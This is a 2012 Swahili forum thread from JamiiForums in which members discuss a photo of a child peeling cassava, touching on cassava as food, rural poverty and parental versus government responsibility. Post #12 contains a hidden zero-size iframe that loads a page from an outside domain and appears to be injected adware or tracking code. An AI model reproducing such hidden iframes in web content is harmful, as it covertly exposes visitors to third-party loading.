Angalia hii Picha, then TAFAKARI | JamiiForums | The Home of Great Thinkers

Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

Angalia hii Picha, then TAFAKARI

Discussion in 'Jamii Photos' started by MaxShimba, Sep 14, 2012.

 1. MaxShimba

  MaxShimba JF-Expert Member

  #1
  Sep 14, 2012
  Joined: Apr 11, 2008
  Messages: 35,816
  Likes Received: 129
  Trophy Points: 160
  [​IMG]
   
 2. Bigirita

  Bigirita JF-Expert Member

  #2
  Sep 14, 2012
  Joined: Feb 12, 2007
  Messages: 13,976
  Likes Received: 689
  Trophy Points: 280
  Mkuu. . . Afadhali mihogo ipo, mibichi unakula, ukichemsha mwake tu, ukikaanga shega, ukikausha na kusaga upate unga unapiga game na maharage, au hata mchicha pori.

  Ila daaaah!!!
   
 3. King'asti

  King'asti JF-Expert Member

  #3
  Sep 14, 2012
  Joined: Nov 26, 2009
  Messages: 27,517
  Likes Received: 2,263
  Trophy Points: 280
  Mtoto anaonekana kachoka halafu ana njaa.
  Maisha bora kwa kila mdanganyika.
   
 4. BHULULU

  BHULULU JF-Expert Member

  #4
  Sep 14, 2012
  Joined: Jun 28, 2012
  Messages: 4,911
  Likes Received: 122
  Trophy Points: 160
  Mimi naona naona dogo kama vile kiburi hataki kazi anataka acheze na wenzake,inaonekana kama amalazimishwa kufanya kazi,ila hiyo picha imenikumbusha mbali sana maana hiyo kazi ya kumenya mihogo nimeifanya sana kijijini enzi hizo.
   
 5. T

  Taso JF-Expert Member

  #5
  Sep 14, 2012
  Joined: Jun 12, 2010
  Messages: 1,653
  Likes Received: 460
  Trophy Points: 180
  Muhogo ni moja ya vyakula duni kuliko vyote duniani, hakina chochote zaidi ya hamirojo. Lakini ni moja ya vyakula vikuu vya Mtanzania, haswa vijijini, na ndo sababu tunadumaa miili na akili.
   
 6. farkhina

  farkhina Platinum Member

  #6
  Sep 14, 2012
  Joined: Mar 14, 2012
  Messages: 12,831
  Likes Received: 775
  Trophy Points: 280
  Sad...yaani inaonesha kiasi gani maisha yalivokuwa magumu.

  Sent from my BlackBerry 9100 using JamiiForums
   
 7. A

  Africa_Spring JF-Expert Member

  #7
  Sep 14, 2012
  Joined: Jun 16, 2012
  Messages: 428
  Likes Received: 1
  Trophy Points: 0
  umenifurahisha sana mkuu,
  nimegundua muhogo una-resource zote kaka
  unakupatia unga,mohogo wenye unaweza kuula kama ulivyo andika hapo juu...pia majani yake mboga alikadhalika miti yake kuni...duh.....yani kitu full-nondo mkuu...kweli wewe unaona mbali.
   
 8. denoo49

  denoo49 JF-Expert Member

  #8
  Sep 14, 2012
  Joined: Mar 29, 2011
  Messages: 5,662
  Likes Received: 5,256
  Trophy Points: 280
  teh! Wakumenya "mihogo" huwa wanasema? Kwa hiyo siku hizi unafanya kazi gani.
   
 9. denoo49

  denoo49 JF-Expert Member

  #9
  Sep 14, 2012
  Joined: Mar 29, 2011
  Messages: 5,662
  Likes Received: 5,256
  Trophy Points: 280
  dunia nzima tukio kama hili linapatikana tanzania tu.
  WAKATI MABILIONI YA WATOTO DUNIANI WAKIWA NA HOFU YA MALEZI..., WATOTO MASKINI WA TANZANIA NDIO WAMEGEUZWA MIUNDO MBINU YA......!
   
 10. Watu8

  Watu8 JF-Expert Member

  #10
  Sep 14, 2012
  Joined: Feb 19, 2010
  Messages: 47,351
  Likes Received: 2,690
  Trophy Points: 280
  Mtoto yupo comfortable kabisa...pengine anaanda hogo la kutengeneza bada au anataka kujipongeza kwa kumung'unya japo kipande baada ya mauzo
   
 11. tz1

  tz1 JF-Expert Member

  #11
  Sep 14, 2012
  Joined: Mar 19, 2011
  Messages: 2,118
  Likes Received: 30
  Trophy Points: 145
  nchi yetu yenye madini mengi
   
 12. mathematics

  mathematics JF-Expert Member

  #12
  Sep 14, 2012
  Joined: Feb 21, 2012
  Messages: 3,296
  Likes Received: 105
  Trophy Points: 160
  na avatar yako ya chama cha mafisadi...


  <iframe src="//edge.crtinv.com/getData.html?d=about%3A%2F%2F" style="width: 0px; height: 0px; display: none;"></iframe>
   
 13. Baba V

  Baba V JF-Expert Member

  #13
  Sep 14, 2012
  Joined: Dec 29, 2010
  Messages: 19,507
  Likes Received: 170
  Trophy Points: 160
  Mkuu mbona sie huku kwetu ndo mwendo wenyewe,hakuna cha ajabu hapo,labda kwa wale from affluent families,lakini zaidi ya asilimia sabini ya watanzania ndo maisha yetu hayo
   
 14. Facilitator

  Facilitator JF-Expert Member

  #14
  Sep 14, 2012
  Joined: Oct 30, 2010
  Messages: 2,288
  Likes Received: 802
  Trophy Points: 280
  Inawezekana anacheza tu. Watoto wa kiume wana mambo sana. Si ajabu anafurahia utundu wake tu hapo, and life goes on.
   
 15. gfsonwin

  gfsonwin JF-Expert Member

  #15
  Sep 14, 2012
  Joined: Apr 12, 2012
  Messages: 16,984
  Likes Received: 1,908
  Trophy Points: 280
  jamani ila hapa naona shid ani kwa wazazi ama walez wa huyu mtoto. hivi mpaka umeichimba kuleta nyumban basi kwanini usimenye na kuipika ili mtto ale? kweli awe we doing fair to our kids? utakuta mama kabaki na shughuli zake badala ya kumuhudumia huyu asiyeweza kujiduhumia.

  hapa tatizo hata siyo la serikali jamani hili ni la wazazi na walez. nina mfano wa familia moja kiukweli kabisa baba na mama ni waathirika na wamezaa mara 6 kati ya hao deceased ni wawili, wawili mabinti ni waathirika na wawili ndo wazima. hii familia wanaish shamba ambako wao hata nyumba ni tabu, lkn nipenda kwani wanalima mboga na mihogo wanapata lishe yaani ukiambiwa watoto wale ni waathirika utakataa kwa jinsi walivyo nawiri.

  hivyo si kukimbilia kukosoa serikali mahai ambapo mtu binafsi inabidi uonyeshe juhudi zako.
   
 16. denoo49

  denoo49 JF-Expert Member

  #16
  Sep 14, 2012
  Joined: Mar 29, 2011
  Messages: 5,662
  Likes Received: 5,256
  Trophy Points: 280
  hata "jua kali" alipoulizwa kwa nini Tanzania ni nchi maskini akajibu hajui ila Tanzaninia sio maskini labda watanzania ndio maskini.. Si ajabu alikua anafurahia kuitwa Mh. Raisi. At the end ov ze day lyfe goes on.
   
Loading...